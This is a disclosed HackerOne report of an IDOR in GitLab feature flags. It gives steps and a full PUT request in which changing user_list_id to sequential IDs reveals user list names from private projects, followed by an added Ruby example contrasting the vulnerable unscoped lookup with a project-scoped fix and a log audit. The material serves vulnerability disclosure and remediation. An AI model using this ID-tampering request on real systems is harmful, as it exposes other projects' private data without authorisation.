IDOR-Get feature flag user list (including user IDs) of any private/public projects
HackerOne report #962408 by ashish_r_padelkar
on 2020-08-19, assigned to @kaunghtet:
Report
Summary
Hello,
It is possible to get the feature flag user list of any private or public project by supplying its 2 digit sequential ID in the request. This way all such feature flag user lists can be enumerated.
Steps to reproduce
1. Go to https://gitlab.com/<NameSpace>/project_1/-/feature_flags
2. Edit any existing feature flag.
3. In the Type dropdown select the User List option, then select the available user list from your project.
4. Click save and capture the request below.
PUT /group_new_1/project_1/-/feature_flags/1 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 295
Accept: application/json, text/plain, */*
X-CSRF-Token: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/group_new_1/project_1/-/feature_flags/1/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: 1
{"operations_feature_flag":{"name":"wwwwww","description":"","version":"new_version_flag","active":true,"strategies_attributes":[{"id":532,"name":"gitlabUserList","_destroy":false,"scopes_attributes":[{"id":1146,"_destroy":false,"environment_scope":"wwww"}],"parameters":{},"user_list_id":39}]}}
5. Change the value of the user_list_id parameter in the above request to any 2 digit sequential ID and send the request.
You should see the name of the user list in the response, as well as on the feature flag page when you reload. Note that this is also possible when the user lists you obtain belong to private projects.
What is the current bug behavior?
Possible to get Feature Flag user list name of any project (including private)
What is the expected correct behavior?
If feature flag user list belongs to private project, you should not be able to get the name of it.
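The root cause described in this report is the classic IDOR pattern: the server trusts the user_list_id from the request body and looks the record up globally instead of within the project that owns the feature flag. The following is an added example, not GitLab's code, that models this in plain Ruby with constructed in-memory data: the unscoped lookup that leaks another project's list name, the project-scoped lookup that fixes it (the equivalent of a project.user_lists.find(id) style query), and a defender-side audit over constructed request records that flags cross-project references. All project paths, list names and IDs here are made up except the user_list_id 39 and project path taken from the report.

```ruby
# Added example (not GitLab code): in-memory model of the feature-flag
# strategy update showing the unscoped lookup that causes the IDOR next
# to the project-scoped lookup that prevents it.

Project  = Struct.new(:id, :path, :private)
UserList = Struct.new(:id, :project_id, :name)

# Constructed sample data: two projects, each owning one user list.
# project_1 and user list 39 are from the report; the rest is made up.
PROJECTS = {
  1 => Project.new(1, "group_new_1/project_1", false),
  2 => Project.new(2, "other_group/secret_project", true),
}.freeze

USER_LISTS = {
  39 => UserList.new(39, 1, "beta-testers"),
  40 => UserList.new(40, 2, "internal-staff"),
}.freeze

class NotFound < StandardError; end

# Vulnerable variant: the id from the request body is resolved globally,
# so any existing user list is accepted regardless of which project owns
# it, and its name is echoed back in the response.
def attach_user_list_unscoped(project, user_list_id)
  list = USER_LISTS[user_list_id]
  raise NotFound unless list
  { project: project.path, user_list_id: list.id, user_list_name: list.name }
end

# Hardened variant: the lookup is scoped to the project handling the
# request. A list owned by another project is indistinguishable from a
# non-existent one, so nothing about it (not even its name) leaks.
def attach_user_list_scoped(project, user_list_id)
  list = USER_LISTS[user_list_id]
  raise NotFound unless list && list.project_id == project.id
  { project: project.path, user_list_id: list.id, user_list_name: list.name }
end

# Defender-side audit over request records (constructed here): return the
# updates whose user_list_id belongs to a different project than the one
# named in the request URL. Useful for checking historical logs once the
# scoping fix has shipped.
def cross_project_references(requests)
  requests.select do |req|
    project = PROJECTS.values.find { |p| p.path == req[:project_path] }
    list = USER_LISTS[req[:user_list_id]]
    project && list && list.project_id != project.id
  end
end

# Constructed request log: one legitimate update and one cross-project one.
SAMPLE_REQUESTS = [
  { project_path: "group_new_1/project_1", user_list_id: 39 },
  { project_path: "group_new_1/project_1", user_list_id: 40 },
].freeze

if __FILE__ == $PROGRAM_NAME
  p attach_user_list_unscoped(PROJECTS[1], 40)  # leaks "internal-staff"
  begin
    attach_user_list_scoped(PROJECTS[1], 40)
  rescue NotFound
    puts "scoped lookup: user list 40 not found for project_1"
  end
  p cross_project_references(SAMPLE_REQUESTS)
end
```

The scoped variant returns the same 404 for "does not exist" and "belongs to someone else", which is the behaviour the expected-behaviour section asks for: the name of a private project's list is never returned to a caller who only knows its numeric ID.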
Output of checks
This bug happens on GitLab.com GitLab Enterprise Edition 13.3.0-pre 9bb21f0d61c
Regards,
Ashish
Impact
IDOR to get feature flag user list names from any project (including private)